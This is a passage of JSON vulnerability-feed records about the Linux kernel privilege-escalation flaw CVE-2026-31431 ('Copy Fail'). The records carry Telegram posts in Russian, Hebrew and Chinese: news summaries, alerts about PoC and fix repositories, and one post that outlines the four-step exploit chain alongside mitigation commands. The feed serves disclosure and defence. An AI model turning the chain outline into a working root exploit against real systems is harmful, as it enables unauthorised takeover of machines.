\u0447\u0442\u043e \u0441\u0430\u043c\u0430 \u043f\u043e \u0441\u0435\u0431\u0435 \u044d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0439 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c root-\u043f\u0440\u0430\u0432\u0430, \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u043e\u0432\u0440\u0435\u0434\u0438\u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0441 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u0444\u043b\u0430\u0433\u043e\u043c setuid.\n\n\u042d\u0442\u0430 \u0436\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432\u0441\u0435\u043c\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430\u043c\u0438 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u0432 \u043e\u0442\u0432\u0435\u0442 \u043d\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445  \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f (Amazon Linux, Debian, Red Hat Enterprise Linux, SUSE \u0438 Ubuntu)\n\n\u041f\u0440\u0438\u043c\u0435\u0447\u0441\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u0447\u0442\u043e Copy Fail \u043f\u0435\u0440\u0435\u043a\u043b\u0438\u043a\u0430\u0435\u0442\u0441\u044f \u0441 Dirty Pipe (CVE-2022-0847), \u0434\u0440\u0443\u0433\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e LPE \u0432 \u044f\u0434\u0440\u0435 Linux, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432\u043d\u0435\u0434\u0440\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0444\u0430\u0439\u043b\u043e\u0432, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f, \u0438 \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430.\n\n\u041a\u0430\u043a \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438 \u0432 Bugcrowd, \u043e\u0448\u0438\u0431\u043a\u0430 \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f - \u044d\u0442\u043e \u043f\u0440\u0438\u043c\u0438\u0442\u0438\u0432 \u0442\u043e\u0433\u043e \u0436\u0435 \u043a\u043b\u0430\u0441\u0441\u0430, \u043d\u043e \u0432 \u0434\u0440\u0443\u0433\u043e\u0439 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435. \u041e\u043f\u0442\u0438\u043c\u0438\u0437\u0430\u0446\u0438\u044f \u043d\u0430 \u043c\u0435\u0441\u0442\u0435 2017 \u0433\u043e\u0434\u0430 \u0432 algif_aead \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043a\u044d\u0448\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u0441\u043f\u0438\u0441\u043e\u043a \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0434\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u044f\u0434\u0440\u0430 \u0434\u043b\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 AEAD, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u043a\u0435\u0442 AF_ALG.\n\n\u041d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0437\u0430\u0442\u0435\u043c \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c splice() \u0432 \u044d\u0442\u043e\u043c \u0441\u043e\u043a\u0435\u0442\u0435 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u0443\u044e \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0444\u0430\u0439\u043b\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043e\u043d \u043d\u0435 \u0432\u043b\u0430\u0434\u0435\u0435\u0442\u00bb.\n\n\u041e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0447\u0435\u0442\u043a\u043e \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0438 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0439 \u0433\u043e\u043d\u043a\u0438 \u0438\u043b\u0438 \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u044f\u0434\u0440\u0430. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u043e\u0434\u0438\u043d \u0438 \u0442\u043e\u0442 \u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0432\u043e \u0432\u0441\u0435\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c, \u0432 Xint.io \u0435\u0435 \u0441\u0447\u0438\u0442\u0430\u044e\u0442 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u043e\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u043d\u0430 \u043e\u0431\u043b\u0430\u0434\u0430\u0435\u0442 \u0447\u0435\u0442\u044b\u0440\u044c\u043c\u044f \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0447\u0442\u0438 \u043d\u0438\u043a\u043e\u0433\u0434\u0430 \u043d\u0435 \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u044e\u0442\u0441\u044f \u0432\u043c\u0435\u0441\u0442\u0435: \u043f\u043e\u0440\u0442\u0430\u0442\u0438\u0432\u043d\u0430, \u043c\u0438\u043d\u0438\u0430\u0442\u044e\u0440\u043d\u0430, \u0441\u043a\u0440\u044b\u0442\u043d\u0430 \u0438 \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u0438\u043c\u0430 \u0441 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u043c\u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430\u043c\u0438.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u044e\u0431\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043e\u0442 \u0443\u0440\u043e\u0432\u043d\u044f \u0435\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u043f\u043e\u043b\u043d\u043e\u0433\u043e \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430. \u041e\u043d\u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u043f\u0435\u0441\u043e\u0447\u043d\u0438\u0446\u0443 \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0432\u043e \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0438 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux.", "creation_timestamp": "2026-04-30T11:37:09.000000Z"}, {"uuid": "617440b9-f58c-4ec8-91d3-91466589ed20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/CyberSecurityIL/84118", "content": "\u05e9\u05d9\u05de\u05d5 \u05dc\u05d1 \u05dc\u05d7\u05d5\u05dc\u05e9\u05d4 CVE-2026-31431 \u05e9\u05e7\u05d9\u05d1\u05dc\u05d4 \u05d0\u05ea \u05d4\u05db\u05d9\u05e0\u05d5\u05d9 copy.fail.\n\n\u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 \u05de\u05d0\u05e4\u05e9\u05e8\u05ea \u05dc\u05de\u05e9\u05ea\u05de\u05e9 \u05de\u05e7\u05d5\u05de\u05d9 \u05dc\u05d4\u05e2\u05dc\u05d5\u05ea \u05d0\u05ea \u05e8\u05de\u05ea \u05d4\u05d4\u05e8\u05e9\u05d0\u05d5\u05ea \u05dc\u05d0\u05d3\u05de\u05d9\u05df, \u05d5\u05de\u05e9\u05e4\u05d9\u05e2\u05d4 \u05db\u05de\u05e2\u05d8 \u05e2\u05dc \u05db\u05dc \u05de\u05e2\u05e8\u05db\u05d5\u05ea \u05dc\u05d9\u05e0\u05d5\u05e7\u05e1 \u05de\u05d0\u05d6 2017.\n\n\u05e4\u05e8\u05d8\u05d9\u05dd \u05e0\u05d5\u05e1\u05e4\u05d9\u05dd \u05db\u05d0\u05df:\nhttps://copy.fail/\n\nhttps://t.me/CyberSecurityIL/8855", "creation_timestamp": "2026-04-30T12:10:00.000000Z"}, {"uuid": "6a69a951-a178-4e51-a9bd-2b3848333ce8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/zaqwNqROxErLoAZPLGjrhKFpw_N1uc9fU_v0iMfTvi3pqoU", "content": "", "creation_timestamp": "2026-04-30T17:35:09.000000Z"}, {"uuid": "789663c9-b676-429d-a4b7-482b36fe80ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/uz1G0onC-r3WtTIw0HLlakU1YJEK6W_ZeyIZzJtVrph5nPM", "content": "", "creation_timestamp": "2026-05-01T05:24:17.000000Z"}, {"uuid": "c9663542-08f2-4986-accc-3f72114ac747", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82399", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a fix_CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a kdjnb\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 00:57:58\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u7834\u574fCVE-2026-31431\u6240\u9700\u7684\u6f0f\u6d1e\u7ec4\u4ef6\uff0c\u4ece\u800c\u8fbe\u5230\u65e0\u6cd5\u901a\u8fc7CVE-2026-31431\u63d0\u6743\u3002\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T01:00:04.000000Z"}, {"uuid": "5397ede4-bb02-4217-9073-c9b785c0ddb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/ptescalator/714", "content": "Copy.Fail \ud83d\udc27\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0431\u0430\u0433 \u0432 \u044f\u0434\u0440\u0435 Linux, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043e\u0432\u0430\u043b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0441 2017 \u0433\u043e\u0434\u0430 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0441\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-31431, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u044b \u0441\u0447\u0438\u0442\u0430\u0435\u043c \u0442\u0440\u0435\u043d\u0434\u043e\u0432\u043e\u0439, \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0438\u0437 \u0447\u0435\u0442\u044b\u0440\u0435\u0445 \u0448\u0430\u0433\u043e\u0432:\n\n1\ufe0f\u20e3 \u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0441\u043e\u043a\u0435\u0442 AF_ALG \u0438 \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442 AEAD-\u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u0431\u0435\u0437 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439;\n\n2\ufe0f\u20e3 \u0427\u0435\u0440\u0435\u0437 splice() \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u043a\u044d\u0448\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u043f\u043e\u043f\u0430\u0434\u0430\u044e\u0442 \u0432 \u0431\u0443\u0444\u0435\u0440 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438;\n\n3\ufe0f\u20e3 \u041e\u0448\u0438\u0431\u043a\u0430 \u0432 authencesn \u0434\u0430\u0435\u0442 \u0437\u0430\u043f\u0438\u0441\u044c 4 \u0431\u0430\u0439\u0442 \u0437\u0430 \u0433\u0440\u0430\u043d\u0438\u0446\u044b \u0431\u0443\u0444\u0435\u0440\u0430 \u043f\u0440\u044f\u043c\u043e \u0432 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u043a\u044d\u0448\u0430;\n\n4\ufe0f\u20e3 \u042f\u0434\u0440\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 setuid-\u0444\u0430\u0439\u043b \u0438\u0437 \u043a\u044d\u0448\u0430 \u2192 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root.\n\n\u0414\u0430\u043d\u043d\u0430\u044f \u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e \u0441\u0445\u043e\u0436\u0430 \u0441 Dirty Pipe (CVE-2022-0847), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u0432\u044b\u0437\u043e\u0432\u044b:\n\n\u2022 pipe \u2014 \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u043e\u0434\u043d\u043e\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u0430\u043d\u0430\u043b \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0434\u0430\u043d\u043d\u044b\u0445;\n\n\u2022 splice \u2014 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043c\u0435\u0436\u0434\u0443 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u043c\u0438 \u0434\u0435\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430\u043c\u0438 \u0431\u0435\u0437 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u0447\u043d\u043e\u0433\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f.\n\n\u0422\u0430\u043a \u043a\u0430\u043a \u0434\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0436\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u043b\u0430\u0441\u044c \u0432 PT Sandbox \u043f\u0440\u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0435 \u041f\u041e \u0432 \u043e\u0431\u0440\u0430\u0437\u0435 Astra Linux, \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Copy Fail \u0442\u0430\u043a\u0436\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u043b\u0430\u0441\u044c \u0432 PT Sandbox \u0435\u0449\u0435 \u0434\u043e \u0432\u044b\u0445\u043e\u0434\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430.\n\n\u0411\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u044d\u0442\u043e\u043c\u0443 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0443 \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e suid-\u0444\u0430\u0439\u043b\u044b, \u043d\u043e \u0438 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u0435 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0434\u0435\u043b\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0431\u043e\u043b\u0435\u0435 \u0441\u043a\u0440\u044b\u0442\u043d\u044b\u043c\u0438.\n\n\u041a\u0430\u043a \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c \ud83d\udd27\n\n\u0415\u0441\u043b\u0438 \u0432\u044b \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442\u0435 Linux-\u0441\u0438\u0441\u0442\u0435\u043c\u044b \u2014 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u0435 \u044f\u0434\u0440\u043e. \u041f\u0430\u0442\u0447 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d \u0432 \u043a\u043e\u043c\u043c\u0438\u0442\u0435 a664bf3d603d. \u041e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b \u043d\u0430\u0447\u0430\u043b\u0438 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u043f\u0430\u043a\u0435\u0442\u044b \u0441 29 \u0430\u043f\u0440\u0435\u043b\u044f. \u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u043e\u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430.\n\n\u0415\u0441\u043b\u0438 \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u2014 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u0430\u044f \u043c\u0435\u0440\u0430: \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043c\u043e\u0434\u0443\u043b\u044c algif_aead:\n\n\necho \"install algif_aead /bin/false\" > /etc/modprobe.d/disable-algif-aead.conf\n\nrmmod algif_aead 2>/dev/null\n\n#cve #tip\n@ptescalator", "creation_timestamp": "2026-04-30T14:57:47.000000Z"}, {"uuid": "eae8e270-7ae3-4621-b321-42ae800c2132", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82406", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a modrosnlr5\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ROSNLR5\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 02:58:53\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nLinux Kernel LPE PoC (CVE-2026-31431)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T03:00:04.000000Z"}, {"uuid": "e49a4bf7-1364-4dd0-ac00-594f38f2d7c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82412", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ashok523\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a HTML\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 03:38:34\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nhe recently disclosed CVE-2026-31431 \u2014 also known as Copy Fail \u2014 is not something to take lightly. \n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T04:00:04.000000Z"}, {"uuid": "c4b76f63-f90b-43e1-9f49-252c46319142", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/KspXoTAZwNnyoY0fEBjlny_6gTq9EiPaKDTUOSCE9_4iY-U", "content": "", "creation_timestamp": "2026-04-29T23:00:12.000000Z"}, {"uuid": "1418487a-3d27-4174-b26c-8c75938c38ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82451", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a 